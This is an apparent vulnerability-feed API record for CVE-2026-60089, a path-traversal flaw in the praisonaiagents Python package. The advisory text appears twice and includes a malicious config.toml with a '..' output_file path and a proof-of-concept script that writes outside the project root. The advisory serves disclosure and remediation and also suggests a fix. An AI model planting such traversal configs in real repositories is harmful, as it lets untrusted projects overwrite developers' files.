{"success":true,"data":{"threats":[{"id":"fdf53fb0-5ad0-40c4-902d-ebddbd950e23","slug":"cve-2026-60089","externalId":"GHSA-qjw5-xwrp-xwpq","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: Project config can auto-save agent output outside the project root","description":"# Project config can auto-save agent output outside the project root\n\n## Summary\n\n`praisonaiagents` automatically reads project-local `.praisonai/config.toml` defaults when constructing an `Agent`. A repository-controlled config can set `defaults.output.output_file` to an absolute path or a `..` traversal path. When the developer later calls `agent.start(...)`, PraisonAI writes the agent response to that path with `open(..., \"w\")`, creating parent directories if needed.\n\nThis lets an untrusted project overwrite files outside the project root with the privileges of the user running PraisonAI.\n\n## Technical Details\n\nThe source-to-sink path is `Agent.__init__()` project config loading to `OutputConfig.output_file` to public `agent.start()` output auto-save. `praisonaiagents/agent/agent.py` applies config-driven defaults before parameter resolution; if the caller did not explicitly pass `output`, it calls `apply_config_defaults(\"output\", output, OutputConfig)`. `praisonaiagents/config/loader.py` treats a config block with `enabled = true` as active and instantiates `OutputConfig` from the remaining keys. `OutputConfig` includes `output_file`, and the agent stores that value as `self._output_file`.\n\nAfter `agent.start(...)` obtains a truthy result from `self.chat(...)`, `praisonaiagents/agent/execution_mixin.py` calls `_save_output_to_file(str(result))` when `self._output_file` is set. `praisonaiagents/agent/memory_mixin.py` then runs `expanduser()` and `abspath()`, creates parent directories, and writes the destination with mode `w`. It does not constrain the resolved path to the current project, reject absolute paths, reject `..`, or distinguish an output path explicitly chosen by trusted application code from one loaded out of a project-local config file.\n\nThis is not a claim that explicit `Agent(output=OutputConfig(output_file=...))` chosen by trusted application code is unsafe by itself. The security boundary crossed here is the automatically consumed project-local config file: a checked-out project can steer the write destination without the application code opting into that path.\n\n## PoV\n\nCreate a project containing:\n\n```toml\n[defaults.output]\nenabled = true\noutput_file = \"../victim-outside-project/agent-output.txt\"\n```\n\nThen run ordinary agent code from inside that project without passing an explicit `output` parameter. The resolved output path escapes the project root, and PraisonAI writes the agent response there after `agent.start(...)`.\n\nI verified this locally without any external model call by replacing `agent.chat` with a deterministic offline stub after constructing the real `Agent`; the public `start()` method still performed the auto-save. Current-head output:\n\n```json\n{\n  \"configured_output_file\": \"../victim-outside-project/agent-output.txt\",\n  \"escaped_project_root\": true,\n  \"source_head\": \"3aa9cbc2bd49c23a32be0a89a5e620d13d843eab\",\n  \"start_returned\": true,\n  \"canary_written\": true\n}\n```\n\nNegative controls:\n\n```json\n[\n  {\n    \"case\": \"safe-relative\",\n    \"configured_output_file\": \"inside-output.txt\",\n    \"expected_file_escaped_project\": false,\n    \"expected_file_exists\": true,\n    \"observed_files\": {\n      \"project/inside-output.txt\": \"PRAISONAI_NEGATIVE_CONTROL_safe-relative\\n\"\n    },\n    \"outside_files\": [],\n    \"start_returned\": true\n  },\n  {\n    \"case\": \"disabled-output\",\n    \"configured_output_file\": null,\n    \"expected_file_escaped_project\": null,\n    \"expected_file_exists\": false,\n    \"observed_files\": {},\n    \"outside_files\": [],\n    \"start_returned\": true\n  }\n]\n```\n\nThe first control shows a safe relative output path stays inside the project. The second control shows a traversal `output_file` is not applied when `defaults.output.enabled` is false.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom praisonaiagents import Agent\nfrom praisonaiagents.config.loader import clear_config_cache\n\nwork = Path(\"praison-outputfile-poc\").resolve()\nproject = work / \"untrusted-project\"\nvictim = work / \"victim-outside-project\" / \"agent-output.txt\"\n\nshutil.rmtree(work, ignore_errors=True)\n(project / \".praisonai\").mkdir(parents=True)\nvictim.parent.mkdir(parents=True)\n\n(project / \".praisonai\" / \"config.toml\").write_text(\n    \"[defaults.output]\\n\"\n    \"enabled = true\\n\"\n    'output_file = \"../victim-outside-project/agent-output.txt\"\\n',\n    encoding=\"utf-8\",\n)\n\nos.chdir(project)\nclear_config_cache()\n\nagent = Agent(instructions=\"offline PoC\")\nagent.chat = lambda prompt, **kwargs: \"PRAISONAI_OUTPUTFILE_CANARY\\n\"\nagent.start(\"offline prompt\")\n\nprint(victim.read_text(encoding=\"utf-8\"))\nprint(victim.resolve())\n```\n\nExpected affected result:\n\n- `victim-outside-project/agent-output.txt` is created outside `untrusted-project`.\n- The file contains `PRAISONAI_OUTPUTFILE_CANARY`.\n\n## Impact\n\nA malicious repository can cause PraisonAI to truncate and replace files outside the repository when a developer runs agent code from that directory. The write is limited to the permissions of the local user, but that commonly includes dotfiles, project-adjacent files, CI workspace files, and other user-writable paths.\n\nThe content written is the agent response rather than arbitrary bytes in the strictest sense. However, the same untrusted project can influence the agent prompt/config context, and the primitive is still an unintended file overwrite outside the project boundary.\n\n## Suggested Fix\n\nTreat `output_file` loaded from project-local config as untrusted:\n\n- Resolve project-configured `output_file` relative to the project root and reject paths that escape that root after symlink-aware normalization.\n- Reject absolute paths and `..` traversal in project config by default.\n- Preserve existing behavior for explicit trusted application code, for example `Agent(output=OutputConfig(output_file=...))`, or require an explicit `allow_external_output_file` opt-in for config-sourced paths.\n- Avoid creating parent directories outside the allowed root for config-sourced output.\n- Add regression tests for `.praisonai/config.toml` with relative traversal, absolute paths, and symlinked parent directories.\n\n## Affected Package/Versions\n\nConfirmed affected:\n\n- GitHub current head `3aa9cbc2bd49c23a32be0a89a5e620d13d843eab`.\n- `praisonaiagents` 1.6.64, latest PyPI release at test time.\n- `praisonaiagents` 1.6.63, previous PyPI release tested.\n\nThe `praisonai` package version 4.6.64 depends on `praisonaiagents>=1.6.64`, so `praisonai` users can receive the affected code transitively when they use the `praisonaiagents.Agent` path.\n\n## Advisory History\n\nI did not find an existing advisory summary for `output_file` / `OutputConfig` / `defaults.output` project-configured output path escape in the repository advisory list.\n\nRelated but distinct advisories exist for other PraisonAI path traversal, file-write, file-read, and tool boundary issues. This report covers the `praisonaiagents` project config to `OutputConfig.output_file` auto-save path.\n\nNo public disclosure or external submission was performed as part of this report preparation.\n\n## References\n\n- `praisonaiagents/agent/agent.py`: config defaults are applied to `output`, then `output_file` is stored on the agent.\n- `praisonaiagents/config/loader.py`: enabled config defaults instantiate the requested config class.\n- `praisonaiagents/config/feature_configs.py`: `OutputConfig.output_file`.\n- `praisonaiagents/agent/execution_mixin.py`: `start()` auto-saves agent output.\n- `praisonaiagents/agent/memory_mixin.py`: `_save_output_to_file()` resolves and writes the configured path without project containment.","cveId":"CVE-2026-60089","cvssScore":null,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","severity":"medium","vendor":"PyPI","product":"praisonaiagents","affectedVersions":["pkg:pypi/praisonaiagents < 1.6.78"],"cwes":["CWE-22","CWE-73"],"tags":["osv","osv:ghsa-qjw5-xwrp-xwpq","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-qjw5-xwrp-xwpq","type":"advisory","title":"OSV GHSA-qjw5-xwrp-xwpq"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qjw5-xwrp-xwpq","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60089","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/3aa9cbc2bd49c23a32be0a89a5e620d13d843eab","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-path-traversal-via-config-toml","type":"other","title":"OSV web"}],"epssScore":0.0018,"epssPercentile":0.06883,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T16:36:34.000Z","addedAt":"2026-10-08T18:42:42.800Z","updatedAt":"2026-10-08T18:42:42.800Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60089","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-60089","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-qjw5-xwrp-xwpq"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-qjw5-xwrp-xwpq"}],"raw":{"id":"GHSA-qjw5-xwrp-xwpq","aliases":["CVE-2026-60089"],"details":"# Project config can auto-save agent output outside the project root\n\n## Summary\n\n`praisonaiagents` automatically reads project-local `.praisonai/config.toml` defaults when constructing an `Agent`. A repository-controlled config can set `defaults.output.output_file` to an absolute path or a `..` traversal path. When the developer later calls `agent.start(...)`, PraisonAI writes the agent response to that path with `open(..., \"w\")`, creating parent directories if needed.\n\nThis lets an untrusted project overwrite files outside the project root with the privileges of the user running PraisonAI.\n\n## Technical Details\n\nThe source-to-sink path is `Agent.__init__()` project config loading to `OutputConfig.output_file` to public `agent.start()` output auto-save. `praisonaiagents/agent/agent.py` applies config-driven defaults before parameter resolution; if the caller did not explicitly pass `output`, it calls `apply_config_defaults(\"output\", output, OutputConfig)`. `praisonaiagents/config/loader.py` treats a config block with `enabled = true` as active and instantiates `OutputConfig` from the remaining keys. `OutputConfig` includes `output_file`, and the agent stores that value as `self._output_file`.\n\nAfter `agent.start(...)` obtains a truthy result from `self.chat(...)`, `praisonaiagents/agent/execution_mixin.py` calls `_save_output_to_file(str(result))` when `self._output_file` is set. `praisonaiagents/agent/memory_mixin.py` then runs `expanduser()` and `abspath()`, creates parent directories, and writes the destination with mode `w`. It does not constrain the resolved path to the current project, reject absolute paths, reject `..`, or distinguish an output path explicitly chosen by trusted application code from one loaded out of a project-local config file.\n\nThis is not a claim that explicit `Agent(output=OutputConfig(output_file=...))` chosen by trusted application code is unsafe by itself. The security boundary crossed here is the automatically consumed project-local config file: a checked-out project can steer the write destination without the application code opting into that path.\n\n## PoV\n\nCreate a project containing:\n\n```toml\n[defaults.output]\nenabled = true\noutput_file = \"../victim-outside-project/agent-output.txt\"\n```\n\nThen run ordinary agent code from inside that project without passing an explicit `output` parameter. The resolved output path escapes the project root, and PraisonAI writes the agent response there after `agent.start(...)`.\n\nI verified this locally without any external model call by replacing `agent.chat` with a deterministic offline stub after constructing the real `Agent`; the public `start()` method still performed the auto-save. Current-head output:\n\n```json\n{\n  \"configured_output_file\": \"../victim-outside-project/agent-output.txt\",\n  \"escaped_project_root\": true,\n  \"source_head\": \"3aa9cbc2bd49c23a32be0a89a5e620d13d843eab\",\n  \"start_returned\": true,\n  \"canary_written\": true\n}\n```\n\nNegative controls:\n\n```json\n[\n  {\n    \"case\": \"safe-relative\",\n    \"configured_output_file\": \"inside-output.txt\",\n    \"expected_file_escaped_project\": false,\n    \"expected_file_exists\": true,\n    \"observed_files\": {\n      \"project/inside-output.txt\": \"PRAISONAI_NEGATIVE_CONTROL_safe-relative\\n\"\n    },\n    \"outside_files\": [],\n    \"start_returned\": true\n  },\n  {\n    \"case\": \"disabled-output\",\n    \"configured_output_file\": null,\n    \"expected_file_escaped_project\": null,\n    \"expected_file_exists\": false,\n    \"observed_files\": {},\n    \"outside_files\": [],\n    \"start_returned\": true\n  }\n]\n```\n\nThe first control shows a safe relative output path stays inside the project. The second control shows a traversal `output_file` is not applied when `defaults.output.enabled` is false.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom praisonaiagents import Agent\nfrom praisonaiagents.config.loader import clear_config_cache\n\nwork = Path(\"praison-outputfile-poc\").resolve()\nproject = work / \"untrusted-project\"\nvictim = work / \"victim-outside-project\" / \"agent-output.txt\"\n\nshutil.rmtree(work, ignore_errors=True)\n(project / \".praisonai\").mkdir(parents=True)\nvictim.parent.mkdir(parents=True)\n\n(project / \".praisonai\" / \"config.toml\").write_text(\n    \"[defaults.output]\\n\"\n    \"enabled = true\\n\"\n    'output_file = \"../victim-outside-project/agent-output.txt\"\\n',\n    encoding=\"utf-8\",\n)\n\nos.chdir(project)\nclear_config_cache()\n\nagent = Agent(instructions=\"offline PoC\")\nagent.chat = lambda prompt, **kwargs: \"PRAISONAI_OUTPUTFILE_CANARY\\n\"\nagent.start(\"offline prompt\")\n\nprint(victim.read_text(encoding=\"utf-8\"))\nprint(victim.resolve())\n```\n\nExpected affected result:\n\n- `victim-outside-project/agent-output.txt` is created outside `untrusted-project`.\n- The file contains `PRAISONAI_OUTPUTFILE_CANARY`.\n\n## Impact\n\nA malicious repository can cause PraisonAI to truncate and replace files outside the repository when a developer runs agent code from that directory. The write is limited to the permissions of the local user, but that commonly includes dotfiles, project-adjacent files, CI workspace files, and other user-writable paths.\n\nThe content written is the agent response rather than arbitrary bytes in the strictest sense. However, the same untrusted project can influence the agent prompt/config context, and the primitive is still an unintended file overwrite outside the project boundary.\n\n## Suggested Fix\n\nTreat `output_file` loaded from project-local config as untrusted:\n\n- Resolve project-configured `output_file` relative to the project root and reject paths that escape that root after symlink-aware normalization.\n- Reject absolute paths and `..` traversal in project config by default.\n- Preserve existing behavior for explicit trusted application code, for example `Agent(output=OutputConfig(output_file=...))`, or require an explicit `allow_external_output_file` opt-in for config-sourced paths.\n- Avoid creating parent directories outside the allowed root for config-sourced output.\n- Add regression tests for `.praisonai/config.toml` with relative traversal, absolute paths, and symlinked parent directories.\n\n## Affected Package/Versions\n\nConfirmed affected:\n\n- GitHub current head `3aa9cbc2bd49c23a32be0a89a5e620d13d843eab`.\n- `praisonaiagents` 1.6.64, latest PyPI release at test time.\n- `praisonaiagents` 1.6.63, previous PyPI release tested.\n\nThe `praisonai` package version 4.6.64 depends on `praisonaiagents>=1.6.64`, so `praisonai` users can receive the affected code transitively when they use the `praisonaiagents.Agent` path.\n\n## Advisory History\n\nI did not find an existing advisory summary for `output_file` / `OutputConfig` / `defaults.output` project-configured output path escape in the repository advisory list.\n\nRelated but distinct advisories exist for other PraisonAI path traversal, file-write, file-read, and tool boundary issues. This report covers the `praisonaiagents` project config to `OutputConfig.output_file` auto-save path.\n\nNo public disclosure or external submission was performed as part of this report preparation.\n\n## References\n\n- `praisonaiagents/agent/agent.py`: config defaults are applied to `output`, then `output_file` is stored on the agent.\n- `praisonaiagents/config/loader.py`: enabled config defaults instantiate the requested config class.\n- `praisonaiagents/config/feature_configs.py`: `OutputConfig.output_file`.\n- `praisonaiagents/agent/execution_mixin.py`: `start()` auto-saves agent output.\n- `praisonaiagents/agent/memory_mixin.py`: `_save_output_to_file()` resolves and writes the configured path without project containment.","summary":"PraisonAI: Project config can auto-save agent output outside the project root","affected":[{"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.6.78"}]}],"package":{"name":"praisonaiagents","purl":"pkg:pypi/praisonaiagents","ecosystem":"PyPI"},"versions":["0.0.1","0.0.10","0.0.100","0.0.101","0.0.102","0.0.103","0.0.104","0.0.105","0.0.106","0.0.107","0.0.108","0.0.109","0.0.11","0.0.110","0.0.111","0.0.112","0.0.113","0.0.114","0.0.115","0.0.116","0.0.117","0.0.118","0.0.119","0.0.12","0.0.120","0.0.121","0.0.122","0.0.123","0.0.124","0.0.125","0.0.126","0.0.127","0.0.128","0.0.129","0.0.13","0.0.130","0.0.131","0.0.132","0.0.133","0.0.134","0.0.135","0.0.136","0.0.137","0.0.138","0.0.139","0.0.14","0.0.140","0.0.141","0.0.142","0.0.143","0.0.144","0.0.145","0.0.146","0.0.147","0.0.148","0.0.149","0.0.15","0.0.150","0.0.151","0.0.152","0.0.153","0.0.154","0.0.155","0.0.156","0.0.157","0.0.158","0.0.159","0.0.16","0.0.160","0.0.161","0.0.162","0.0.163","0.0.164","0.0.165","0.0.166","0.0.167","0.0.168","0.0.169","0.0.17","0.0.170","0.0.171","0.0.172","0.0.173","0.0.174","0.0.175","0.0.176","0.0.177","0.0.178","0.0.179","0.0.18","0.0.180","0.0.181","0.0.182","0.0.183","0.0.184","0.0.185","0.0.187","0.0.188","0.0.189","0.0.19","0.0.190","0.0.191","0.0.192","0.0.193","0.0.194","0.0.195","0.0.196","0.0.197","0.0.198","0.0.199","0.0.2","0.0.20","0.0.21","0.0.22","0.0.23","0.0.24","0.0.25","0.0.26","0.0.27","0.0.28","0.0.29","0.0.3","0.0.30","0.0.31","0.0.32","0.0.33","0.0.34","0.0.35","0.0.36","0.0.37","0.0.38","0.0.39","0.0.4","0.0.40","0.0.41","0.0.42","0.0.43","0.0.44","0.0.45","0.0.46","0.0.47","0.0.48","0.0.49","0.0.5","0.0.50","0.0.51","0.0.52","0.0.53","0.0.54","0.0.56","0.0.57","0.0.58","0.0.59","0.0.6","0.0.60","0.0.61","0.0.62","0.0.63","0.0.64","0.0.65","0.0.66","0.0.67","0.0.68","0.0.69","0.0.7","0.0.70","0.0.71","0.0.72","0.0.73","0.0.74","0.0.75","0.0.76","0.0.77","0.0.78","0.0.79","0.0.8","0.0.80","0.0.81","0.0.82","0.0.83","0.0.84","0.0.85","0.0.86","0.0.87","0.0.88","0.0.89","0.0.9","0.0.90","0.0.91","0.0.92","0.0.93","0.0.94","0.0.95","0.0.96","0.0.97","0.0.98","0.0.99","0.1.0","0.1.1","0.1.10","0.1.11","0.1.12","0.1.13","0.1.14","0.1.15","0.1.16","0.1.17","0.1.18","0.1.19","0.1.2","0.1.20","0.1.21","0.1.22","0.1.23","0.1.24","0.1.25","0.1.26","0.1.27","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","0.10.0","0.10.1","0.10.10","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","0.10.8","0.10.9","0.11.0","0.11.1","0.11.10","0.11.11","0.11.12","0.11.13","0.11.14","0.11.15","0.11.16","0.11.17","0.11.18","0.11.19","0.11.2","0.11.20","0.11.21","0.11.22","0.11.23","0.11.24","0.11.25","0.11.27","0.11.28","0.11.29","0.11.3","0.11.30","0.11.31","0.11.4","0.11.5","0.11.6","0.11.7","0.11.8","0.11.9","0.12.0","0.12.1","0.12.10","0.12.11","0.12.12","0.12.13","0.12.14","0.12.15","0.12.16","0.12.17","0.12.18","0.12.19","0.12.2","0.12.20","0.12.21","0.12.3","0.12.4","0.12.5","0.12.6","0.12.7","0.12.8","0.12.9","0.13.0","0.13.1","0.13.10","0.13.11","0.13.12","0.13.13","0.13.14","0.13.15","0.13.16","0.13.17","0.13.18","0.13.19","0.13.2","0.13.20","0.13.21","0.13.22","0.13.23","0.13.3","0.13.4","0.13.5","0.13.6","0.13.7","0.13.8","0.13.9","0.14.0","0.14.1","0.14.10","0.14.11","0.14.12","0.14.14","0.14.15","0.14.16","0.14.2","0.14.3","0.14.4","0.14.5","0.14.6","0.14.7","0.14.8","0.14.9","0.15.0","0.15.1","0.15.2","0.15.3","0.2.0","0.2.1","0.2.2","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.4.0","0.4.1","0.5.0","0.5.1","0.5.2","0.5.3","0.6.0","0.6.1","0.6.2","0.6.3","0.6.4","0.6.5","0.6.6","0.6.7","0.6.8","0.7.0","0.7.1","0.8.0","0.8.1","0.9.0","0.9.1","1.0.0","1.1.0","1.2.0","1.2.1","1.2.2","1.2.3","1.2.4","1.3.0","1.3.1","1.4.0","1.4.1","1.4.2","1.4.3","1.4.4","1.4.5","1.4.6","1.4.7","1.4.8","1.5.0","1.5.1","1.5.10","1.5.100","1.5.101","1.5.102","1.5.103","1.5.104","1.5.105","1.5.106","1.5.107","1.5.108","1.5.109","1.5.11","1.5.110","1.5.111","1.5.112","1.5.113","1.5.114","1.5.115","1.5.116","1.5.117","1.5.118","1.5.119","1.5.12","1.5.120","1.5.121","1.5.122","1.5.123","1.5.124","1.5.125","1.5.126","1.5.127","1.5.128","1.5.129","1.5.13","1.5.130","1.5.131","1.5.132","1.5.133","1.5.134","1.5.135","1.5.136","1.5.137","1.5.138","1.5.139","1.5.14","1.5.140","1.5.141","1.5.142","1.5.143","1.5.144","1.5.145","1.5.146","1.5.147","1.5.148","1.5.149","1.5.15","1.5.16","1.5.17","1.5.18","1.5.19","1.5.2","1.5.20","1.5.21","1.5.22","1.5.23","1.5.24","1.5.25","1.5.26","1.5.27","1.5.28","1.5.29","1.5.3","1.5.30","1.5.31","1.5.32","1.5.33","1.5.34","1.5.35","1.5.36","1.5.37","1.5.38","1.5.39","1.5.40","1.5.41","1.5.42","1.5.43","1.5.44","1.5.45","1.5.46","1.5.47","1.5.48","1.5.49","1.5.5","1.5.50","1.5.51","1.5.52","1.5.53","1.5.54","1.5.55","1.5.56","1.5.57","1.5.58","1.5.59","1.5.6","1.5.60","1.5.61","1.5.62","1.5.63","1.5.64","1.5.65","1.5.66","1.5.67","1.5.68","1.5.69","1.5.7","1.5.70","1.5.71","1.5.72","1.5.73","1.5.74","1.5.75","1.5.76","1.5.77","1.5.78","1.5.79","1.5.8","1.5.80","1.5.81","1.5.82","1.5.83","1.5.84","1.5.85","1.5.86","1.5.87","1.5.88","1.5.89","1.5.9","1.5.90","1.5.91","1.5.92","1.5.93","1.5.94","1.5.95","1.5.96","1.5.97","1.5.98","1.5.99","1.6.1","1.6.10","1.6.11","1.6.12","1.6.13","1.6.14","1.6.15","1.6.16","1.6.17","1.6.18","1.6.19","1.6.2","1.6.20","1.6.21","1.6.22","1.6.23","1.6.24","1.6.25","1.6.26","1.6.27","1.6.28","1.6.29","1.6.3","1.6.30","1.6.31","1.6.32","1.6.33","1.6.34","1.6.35","1.6.36","1.6.37","1.6.38","1.6.39","1.6.4","1.6.40","1.6.41","1.6.42","1.6.43","1.6.44","1.6.45","1.6.46","1.6.47","1.6.48","1.6.5","1.6.50","1.6.51","1.6.52","1.6.53","1.6.54","1.6.55","1.6.56","1.6.57","1.6.58","1.6.59","1.6.6","1.6.60","1.6.62","1.6.63","1.6.64","1.6.65","1.6.66","1.6.67","1.6.68","1.6.69","1.6.7","1.6.70","1.6.71","1.6.72","1.6.73","1.6.74","1.6.75","1.6.76","1.6.77","1.6.8","1.6.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-qjw5-xwrp-xwpq/GHSA-qjw5-xwrp-xwpq.json","last_known_affected_version_range":"<= 1.6.77"}}],"modified":"2026-10-08T16:45:19.411316913Z","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"}],"published":"2026-10-08T16:36:34Z","references":[{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qjw5-xwrp-xwpq","type":"WEB"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60089","type":"ADVISORY"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/3aa9cbc2bd49c23a32be0a89a5e620d13d843eab","type":"WEB"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"PACKAGE"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-path-traversal-via-config-toml","type":"WEB"}],"schema_version":"1.9.0","database_specific":{"cwe_ids":["CWE-22","CWE-73"],"severity":"MODERATE","github_reviewed":true,"nvd_published_at":null,"github_reviewed_at":"2026-10-08T16:36:34Z"}}}],"pagination":{"page":1,"limit":20,"total":1,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:11:32.017Z","durationMs":5,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":[],"vendor":null,"product":null,"cve":"CVE-2026-60089","source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":["include"],"warnings":[]}}